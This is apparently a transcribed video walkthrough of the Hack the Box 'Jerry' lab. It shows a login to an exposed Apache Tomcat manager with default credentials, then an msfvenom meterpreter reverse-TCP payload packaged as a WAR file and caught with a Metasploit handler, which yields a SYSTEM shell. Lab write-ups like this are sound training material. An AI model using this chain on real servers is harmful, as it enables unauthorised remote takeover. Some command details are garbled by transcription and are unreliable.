What up, hackers and cybersecurity enthusiasts? Today we're going to be looking at Jerry. This is a Windows machine, easy difficulty. Although Jerry is one of the easier machines on Hack the Box, it's realistic as Apache Tomcat is often found exposed and configured with common or weak credentials. Related Academy modules include network enumeration with Nmap, login brute forcing, Windows privilege escalation, broken authentication, attacking common applications, file upload attacks, password attacks, introduction to networking, shells and payloads, and Metasploit framework. Now, categories with this are vulnerability assessments, web applications, and of course, enterprise networks. Areas of interest include common services and security tools. And vulnerabilities are remote code execution, arbitrary file uploads, and default credentials. It's also nice to know a little bit of Java. Now let's get started here. We'll do nmap sc-sv-a-o t4 followed by -p dash. The IP is 10.10.10.95, and we will save that as Jerry nmap. We'll let that run. Let's go ahead and navigate to the IP address. Now we tried 10.10.10.95 port 80 before. It did not work, so we try 80.80, and we're brought to this Apache Tomcat server running version 7.88. And we see a couple boxes on the right here. So we see server status, manager app, and host manager. Click on server status. And we'll click on manager app here, and we are given a box to log in, username and password. We'll try admin, default credentials, and it tells us access is denied. You're not authorized to view this page. If you already configured the manager application to allow access, your browser's back button uses save bookmark, blah, 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 blah. If you have not changed any configuration files, please examine the conf tomcat.users.xml. And for example, the add manager GUI role, username Tomcat with the password of secret. And the following config listed above. If we click on server status, it's just going to tell us a bunch of information about the server, what it's running, the JVM version, the vendor, Oracle Corporation, Windows Server 2012, and there's nothing really of interest here. So we'll go ahead and move on. Next, we're going to try that secret password with admin username for the manager app. Type in Tomcat with secret just to see if this works. Don't save. Looks like access denied. Okay. So we managed to successfully log in with admin secret. And underneath this little terminal, you can see that we have a bunch of context paths, XML configuration, diagnostics, and things of this nature. However, something that's notable is the WAR file to deploy. Now, we can upload files here, and this is the attack vector that we're going to be trying. We'll need to create a payload, so let's go ahead and type in MSF Venom -L to list the payloads. Normally we wouldn't have to do this, but the fact that it is a war file is going to change the configuration of this. We will load all of the windows or interpreter verse shells that we see here. And we have a bunch of lists. We're going to take the Windows interpreter verse TCP shell here. Type in MSF Venom, followed by Windows -x64 -interpreter reverse TCP. We need to make this payload available, so we'll do MSF Venom -L payloads and formats to see which format we're going to use to format this payload. We've got a bunch here. So we'll remove the payload, and we get a list here. So we have ASPX, ASP, Go, ELF, and etc. But at the bottom, upon running that command, MSF Venom -list formats, we see formats available. We've got frameworks formats here. We have base32, 64, DW, Go, Golang, etc., Perl, Python, and then we see war here. So we're going to use this war format. Type in MSF Venom -P Windows x64 interpreter reverse TCP -L for the format, and we will go with war. Let's go ahead and look up our ton 0 here so we can set the L host. We're at 10.10.16.18. L host is equal to 10.10.16.18. And we'll have to set the L port as well. L port will be equal to 9001. Let's press enter and create this payload here. We'll do -F for format, and we are going to format it as a war. And we are going to output it as not a payload.war. And since we're not listing anything, I think, let's see here. We might have to get rid of that. There we go. We'll have to get rid of the list since we're not listing anything, and we'll just go with L host, L port, format war, output not payload.war. Commands not found. And the reason it wasn't found is because it was running in the background. So try it again in the foreground, and it creates not a payload.war. Let's go ahead and upload this war file. And we Alright, so upon creating the payload with MSF Venom, we are going to set up a listener in Interpreter. And we'll set it up. We're going to set up a listener in Metasploit here, so let's go ahead and launch MSFDB. Let's try this again, but run it as root. We'll do MSF console. From here we can search for exploits. We're just going to use a multi-handler here. And basically that's going to handle the payload that we create. or that we created. All right, search exploits here. I'm gonna search for our multi-handler here. Basically, as you can see here, this is a manual input of generic payload handling. So we'll use this multi-handler exploit and use that to load the payload that we created. We'll use exploit multi-handler, and here we can do show options. So here we have the option to include lhost, lport, and what it doesn't show is that we're going to have to use our payload that we created, but that's fine. So we're going to set the payload now to the payload we created, which is Windows x64 meter preter reverse TCP. Now we can go ahead and set options like the lhost and lport. We'll set lhost to our ton0. Sometimes ton0 will not work. Sometimes you actually have to manually set the IP address. Next, we'll set the lport. 9001 should do it. Let's go ahead and you can use run or exploit, doesn't really matter. And now it's just listening. Let's go ahead and launch this. We'll go back to the web page and we're going to upload our payload. Upload notapayload.war, deploy. Okay, we're gonna have to relog in, not a problem. Now, if this happens to you when you're running the box and you try to do restart or reload, you can try to type in the password again, Tomcat with secret, access denied again. So what we're gonna do is delete our cookie. We'll clear the history, reload this. We'll sign in. So there, we'll go ahead and delete our cookies, reset the history, and restart the page so that we can log in. Here we can type in Tomcat secret. It'll get us back in. And then from here, go ahead and upload this. We'll upload notapayload.war, hit deploy. And there we see applications running. We have not caught a shell yet because we haven't executed the program. So here, let's click on notapayload. Got a 404 error. If you notice, we're not getting any shell here when we try to execute this not a payload slash JS. Get UID. We are NT Authority Systems. Okay, well, let's go CD here. Trying to CD into users administrator doesn't work. Not an issue. CD users administrator. Operation failed again. Okay. We'll type in shell. Microsoft version. Okay, and it launches the shell finally. Now we can CD into user administrator. Awesome. LS, not going to work. This is Windows. dir. Got a list of files here. CD to the desktop. We've got flags. Let's CD into flags. dir again. We've got 2 for the price of 1.txt. Very good. We're going to have to get this. I don't think we can cat it, which is fine. Get 2 for the price of 1, if I can spell. So good. Even though I misspelled it, it's fine. We're going to just use type because we're in Windows. It's the proper way to do this. Type 2 for the price of 1.txt. System cannot find the file. We're going to get 2 for the price of 1, but we have a little spelling error here, so. Now, for whatever reason, this shit doesn't want to work, so we're going to use type and then add some quotations 2 for the price of 1.txt, and we get the user and the root. This machine is easy, so, and it's pretty good because it gave us both. It doesn't make us work hard, and sometimes it's nice to get 2 for the price of 1. It really is. So we get user.txt and we also get root.txt. We will submit them both. Now, this is not the way that the walkthrough suggests, but this is the easiest way to actually own this machine. So that was cool. That is Jerry pwned. Thank you guys for watching. Drop a like, comment, and subscribe if you'd like to see more. Thank you.